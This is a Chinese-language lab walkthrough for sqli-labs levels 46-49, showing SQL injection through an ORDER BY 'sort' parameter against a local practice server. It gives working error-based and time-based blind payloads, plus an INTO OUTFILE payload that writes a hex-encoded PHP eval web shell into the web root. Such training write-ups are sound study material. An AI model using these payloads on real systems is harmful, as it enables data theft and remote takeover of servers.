Less46-Less49(?sort order by )

Less-46:  无包裹

之前都是用 ?id=1这种形式，这关它提示我们用sort

 

 

 

所以我们用 ?sort=1  进行操作  其中1代表把第一列按从小到大进行排列

 3 就代表把第3列按从小到大进行排列

 

 类似于我们在sql里的select * from users order by 1 desc;  使用降序进行排列

                                  select * from users order by1 asc;    使用升序进行排列

 

 

 

 

 http://192.168.27.156/sqli-labs/Less-46/?sort=1 desc    第一列降序排列

 

 

 

说明这里存在注入漏洞

 

三种方法：

1. 报错注入
2. 时间盲注
3. 一句话木马

 

方法一：报错注入

http://192.168.27.156/sqli-labs/Less-46/?sort=3 and  updatexml( 1, concat( 0x7e, (database())), 1) --+

 

 

.http://192.168.27.156/sqli-labs/Less-46/?sort=3 and  updatexml( 1, concat( 0x7e, (select schema_name from information_schema.schemata limit 0,1), 1) ,1)--+

 

 

 

 

方法二：时间盲注

http://192.168.27.156/sqli-labs/Less-46/?sort=3 and if(length(database()=1),1,sleep(5))--+

 

 

 

http://192.168.27.156/sqli-labs/Less-46/?sort=3 and if(left((select schema_name from information_schema.schemata limit 0,1),1)>'a',1,sleep(5))--+

 

 

 

 

方法三：一句话木马

 注意下面这个操作并没有将一句话木马写入

http://192.168.27.156/sqli-labs/Less-46/?sort=3 and (select '<?php @eval($_POST[gxy]);?>') into outfile 'C:\\phpStudy\\WWW\\c.php '--+

 

 

 

 

 

 但是我们并没有把一句话木马写进去，所以我们采取  lines  terminated by 0x 十六进制进行注入

 

http://192.168.27.156/sqli-labs/Less-46/?sort=3 into outfile "C:\\phpStudy\\WWW\\c.php" lines terminated by 0x3c3f70687020406576616c28245f504f53545b27677879275d293b203f3e  --+

 

 

 

 

 

 

 Less47:  使用’’包裹  方法与第46关一致

 

 

 

 

Less48:  无包裹  不返回报错信息  不能使用报错注入，其他与第46关一致

 

 

 

 

 

 

 

Less49:  使用’’包裹  不返回报错信息  不能使用报错注入，其他与第46关一致